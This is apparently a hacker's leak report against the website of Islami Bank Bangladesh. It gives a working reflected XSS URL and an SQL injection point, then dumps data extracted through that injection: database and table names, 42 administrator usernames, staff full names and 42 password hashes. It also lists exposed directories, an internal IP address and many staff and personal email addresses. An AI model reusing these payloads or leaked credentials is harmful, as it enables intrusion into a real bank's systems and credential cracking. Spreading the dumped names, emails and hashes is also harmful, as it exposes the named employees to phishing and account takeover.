report2: bangladesh bank

1. **********************************************************************************************
2.  
3. [*] Target: www.islamibankbd.com
4.  
5. [**]Cross-site Scripting:
6.  
7. http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
8.  
9. (work on mozilla firefox)
10.  
11. [**] SQL injection:
12.  
13. http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
14.  
15. [****] Information Leaked from their database:
16.  
17. database: MySQL
18.  
19. [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
20.  
21.  
22.  
23. available databases [2]:
24. [*] information_schema
25. [*] islamidb
26.  
27. Database: islamidb
28. [74 tables]
29. +--------------------------+
30. | annualreport |
31. | ar_cat |
32. | area |
33. | articles |
34. | atm |
35. | atm_area |
36. | atm_location |
37. | audit_committee |
38. | board_of_directors |
39. | books |
40. | branchdtls |
41. | branches |
42. | chairman_corner |
43. | charge_commision |
44. | corporate_info |
45. | currencyrate |
46. | currencyrate0 |
47. | deposit_scheme |
48. | deposit_scheme_info |
49. | dept |
50. | disclosure |
51. | district |
52. | download |
53. | dynamicsections |
54. | email |
55. | eventdetails |
56. | eventdetails_11 |
57. | eventdetails_111 |
58. | events |
59. | executive_committee |
60. | feb_aof_info |
61. | feb_crsp_info |
62. | feb_csc_info |
63. | feb_nrb_info |
64. | feb_rema_info |
65. | feb_repa_info |
66. | fex_graph |
67. | interview |
68. | investment |
69. | jobcategory |
70. | jobdetails |
71. | keypersonal |
72. | link |
73. | link_cat |
74. | management |
75. | managementdetails |
76. | manager_info |
77. | md_corner |
78. | md_news |
79. | md_publication |
80. | news |
81. | notice |
82. | orderby |
83. | orderplacement |
84. | paidup_capital |
85. | personnel |
86. | photo_album |
87. | price_sensative_headline |
88. | privilege |
89. | profit_rate |
90. | publication |
91. | qryjobs |
92. | rds_perform_details |
93. | rds_perform_heading |
94. | shariahcouncil |
95. | shariahdetails |
96. | sme_info |
97. | sme_prd_info |
98. | sme_zone |
99. | sponsors |
100. | sysvalues |
101. | userrights |
102. | users |
103. | video |
104. +--------------------------+
105.  
106. Database: islamidb
107. Table: users
108. [13 columns]
109. +-------------+--------------+
110. | Column | Type |
111. +-------------+--------------+
112. | Address | varchar(50) |
113. | BranchName | varchar(50) |
114. | Depertment | varchar(50) |
115. | Designation | varchar(50) |
116. | Email | varchar(50) |
117. | FullName | varchar(50) |
118. | IsActive | tinyint(4) |
119. | Mobile | varchar(50) |
120. | Password | varchar(255) |
121. | Phone | varchar(50) |
122. | UserID | int(11) |
123. | UserName | varchar(50) |
124. | UserType | char(1) |
125. +-------------+--------------+
126.  
127. Database: islamidb
128. Table: users
129. [42 entries]
130. +------------------+
131. | UserName |
132. +------------------+
133. | atmadmin |
134. | atmimran |
135. | bcdadmin |
136. | bcdraquib |
137. | borhan |
138. | bpmdadmin |
139. | bpmdnizam |
140. | bpmdsaiful |
141. | bsadmin |
142. | bsahashan |
143. | bsfoysal |
144. | chairmanadmin |
145. | chairmanuser |
146. | dsd |
147. | ecsdadmin |
148. | ecsdjahangir |
149. | fadadmin |
150. | fadshaheduzzaman |
151. | hrdabrar |
152. | hrdadmin |
153. | hrdahsan |
154. | hrdmaquddus |
155. | ibwadmin |
156. | ibwmonir |
157. | ictdwebadmin |
158. | khademibw |
159. | mdsadmin |
160. | mdsmohtasim |
161. | mkamal |
162. | prdadmin |
163. | prdhumayan |
164. | rcidadmin |
165. | rddadmin |
166. | rddmashiul |
167. | rddthohid |
168. | rdsadmin |
169. | rdsuser |
170. | shaheduzzaman |
171. | shareadmin |
172. | sharerozaer |
173. | shariahadmin |
174. | shariahhabib |
175. +------------------+
176.  
177.  
178. Database: islamidb
179. Table: users
180. [42 entries]
181. +-------------------------------+
182. | FullName |
183. +-------------------------------+
184. | Admin of HRD |
185. | Ahsan Habib |
186. | Habibur Rahman |
187. | Humayan Rashid |
188. | Imran |
189. | Ismail |
190. | Jahangir Hossain |
191. | Md. Atiqur Rahman khan Khadem |
192. | Md. Borhan Uddin |
193. | Md. Mashiul Alam |
194. | Md. Mostofa Kamal |
195. | Mohammd Thohidul Islam |
196. | Muhammad Abdul Quddus |
197. | Omar Foysal |
198. | Qazi Mohammed Shamsul Abrar |
199. | Rozaer Hossain |
200. | S M Abdur Raquib |
201. | Saiful Islam |
202. | Shaheduzzaman |
203. | Super Admin |
204. |_______________________________
205.  
206.  
207. Database: islamidb
208. Table: users
209. [42 entries]
210. +----------------------------------+
211. | Password |
212. +----------------------------------+
213. | 01e8565004e20ebaaee5d1e948cc0f03 |
214. | 04dcef1b1d1ffff2a2c1f6f31e42348a |
215. | 0d308e5cfbb51143225b884c2d56167e |
216. | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
217. | 119cbed0296edd3415f73ca21d695eb4 |
218. | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
219. | 178b0c400e3cbc03418ee64e7af71b6e |
220. | 2651cea9b74c51aacdbcc1396ce5bfb7 |
221. | 3d3993a6ece38d0c10b155d5facf78e7 |
222. | 3eeb8d98c5dba5919eaed3f93bc317e6 |
223. | 3fb85c9f03577600bc8ba6e2e25a44d5 |
224. | 46f1eeae56bdf1077e1890cf8c8384a3 |
225. | 48cda072801bb304a08aaa19cae8ece6 |
226. | 4c1f0b5771136bf504f8d72144fc0972 |
227. | 5135cebb53ab8a028f9d16d48ca9f5f5 |
228. | 6013ee7dc437d4b10b211110ebeb5dc4 |
229. | 639aa761eb8cdaaf132c98460c3a92be |
230. | 641e4550176313cfcb7004dc6657c54c |
231. | 731c4cece807f681524eeb3c00c075c8 |
232. | 738a639acd1502c515d2ba9a980162e8 |
233. | 7e242f8c51fdb0b1a754bcdec21d0532 |
234. | 806938e17a140d0a2847c6d4a7e88e8c |
235. | 8336f298fed5901d2c58c4c3a0be0522 |
236. | 86d7ffa824672126bd183a8961d95a1e |
237. | 8e099fb1fd7804e63e29ca180853f1a3 |
238. | 9e044b89f318c8848d18ad0f8a64d309 |
239. | 9f6b071e1e1c75a380a99972fd1d6c87 |
240. | a06ea6415499e6fc813cdb756da9fdb6 |
241. | b31d1d300bd4d9438a59169c08535682 |
242. | bd06b23acb9d8f84149500333cc1c7cc |
243. | bd596577eefdf3a60b314512035d7de8 |
244. | bed407e0a32fdd46b71722c11991d9c3 |
245. | cca35a0265721f5ab431821a745056af |
246. | d6dec0fde9d68bb607d25b84d45059f0 |
247. | da1f2fbf9b96c7160869c785b8de4bd6 |
248. | da7c5f47b4c492545aa55ec5887989a1 |
249. | db502e13cc0ad9b22440223c095bcdaf |
250. | e2e796c8d2f15e6eeae1498e063996d1 |
251. | ecdc03a40c52f1a387cb44ddf5740e5d |
252. | f099cd5a70853ec7de964fdbb7027bb9 |
253. | f28d90f403abe8c509aca6bd73930e8f |
254. | f3c94f7cece18ac86ede31265f24a2e7 |
255. +----------------------------------+
256.  
257. [**] Directory Listing Enabled:
258.  
259. Directory listings allow attackers to get better understandings about the server and the application structure. In some situations directory listings may reveal resources which are not supposed to be known.
260.  
261. [-]solution: Disable directory listings.
262.  
263. url: http://www.islamibankbd.com/upload_dir/photo_album/
264.  
265. url: http://www.islamibankbd.com/upload_dir/newsimages/
266.  
267. url: http://www.islamibankbd.com/feedback/
268.  
269. url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/
270.  
271. url: http://www.islamibankbd.com/upload_dir/fex_graph/
272.  
273. url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/
274.  
275. url: http://www.islamibankbd.com/feedback/images/
276.  
277. [**] IP Disclosure:
278.  
279. The server or application disclosed internal network information. This information could be used by attackers to make an educated guess about the internal or external network topology. Leaked IP addresses could be used as a stepping-stone to more complex attacks.
280.  
281. solution: Ensure that sensitive information such as internal or external IP addresses is safely guarded. Unless there is a good, prevent the disclosure of network information.
282.  
283. ip: 192.168.0.69
284.  
285. [**] Email leaked:
286.  
287. email: info@islamibankbd.com
288.  
289.  
290. email: hocc@islamibankbd.com
291.  
292. email: uttara@islamibankbd.com
293.  
294. email: agrabad@islamibankbd.com
295.  
296. email: ibblac@bttb.net.bd
297.  
298. email: dhakacentral@islamibankbd.com
299.  
300. email: dhanmondi@islamibankbd.com
301.  
302. email: elephantroad@islamibankbd.com
303.  
304. email: farmgate@islamibankbd.com
305.  
306. email: idbbhaban@islamibankbd.com
307.  
308. email: kawran@islamibankbd.com
309.  
310. email: khilgaon@islamibankbd.com
311.  
312. email: mogbazar@islamibankbd.com
313.  
314. email: motijheel@islamibankbd.com
315.  
316. email: mouchak@islamibankbd.com
317.  
318. email: newmarket@islamibankbd.com
319.  
320. email: paltan@islamibankbd.com
321.  
322. email: panthapath@islamibankbd.com
323.  
324. email: ramna@islamibankbd.com
325.  
326. email: rampura@islamibankbd.com
327.  
328. email: viproad@islamibankbd.com
329.  
330. email: mannan@islamibankbd.com
331.  
332. email: shaque@islamibankbd.com
333.  
334. email: mhr@islamibankbd.com
335.  
336. email: mnislam@islamibankbd.com
337.  
338. email: hrbhuiyan@islamibankbd.com
339.  
340. email: sadeq@islamibankbd.com
341.  
342. email: imrislam@yahoo.com
343.  
344. email: mdnajibur@gmail.com
345.  
346. email: kabir0136@islamibankbd.com
347.  
348. email: dhakanorth@islamibankbd.com
349.  
350. email: dhakasouth@islamibankbd.com
351.  
352. email: cmb@islamibankbd.com
353.  
354. email: ctgnorth@islamibankbd.com
355.  
356. email: nasir106@islamibankbd.com
357.  
358. email: moula131@yahoo.com
359.  
360. email: khatunganj@islamibankbd.com
361.  
362. email: abdulnaser@yahoo.com
363.  
364. email: admin.portal@islamibankbd.com
365.  
366. email: majhar@islamibankbd.com
367.  
368. email: barisalzone@islamibankbd.com
369.  
370. email: barguna@islamibankbd.com
371.  
372. email: barisal@islamibankbd.com
373.  
374. email: Bhandaria@islamibankbd.com
375.  
376. email: bhola@islamibankbd.com
377.  
378. email: charfashion@islamibankbd.com
379.  
380. email: damodya@islamibankbd.com
381.  
382. email: faridpur@islamibankbd.com
383.  
384. email: gopalgonj@islamibankbd.com
385.  
386. email: hatkhola@islamibankbd.com
387.  
388. email: jhalokathi@islamibankbd.com
389.  
390. email: madaripur@islamibankbd.com
391.  
392. email: miarhat@islamibankbd.com
393.  
394. email: naria@islamibankbd.com
395.  
396. email: patuakhali@islamibankbd.com
397.  
398. email: pirojpur@islamibankbd.com
399.  
400. email: rajbari@islamibankbd.com
401.  
402. email: shariatpur@islamibankbd.com
403.  
404. email: takerhat@islamibankbd.com
405.  
406. email: torki@islamibankbd.com
407.  
408. email: bograzone@islamibankbd.com
409.  
410. email: baragola@islamibankbd.com
411.  
412. email: belkuchi@islamibankbd.com
413.  
414. email: bogra@islamibankbd.com
415.  
416. email: joypurhat@islamibankbd.com
417.  
418. email: mohadevpur@islamibankbd.com
419.  
420. email: naogaon@islamibankbd.com
421.  
422. email: nazipur@islamibankbd.com
423.  
424. email: shapahar@islamibankbd.com
425.  
426. email: sirajganj@islamibankbd.com
427.  
428. email: ctgzone@islamibankbd.com
429.  
430. email: potenga@colbd.com
431.  
432. email: bariyarhat@islamibankbd.com
433.  
434. email: dewanhat@islamibankbd.com
435.  
436. email: fatikchari@islamibankbd.com
437.  
438. email: halishahar@islamibankbd.com
439.  
440. email: hathazari@islamibankbd.com
441.  
442.  
443. [****] Picture:
444. http://www.imagup.com/data/1166122796.html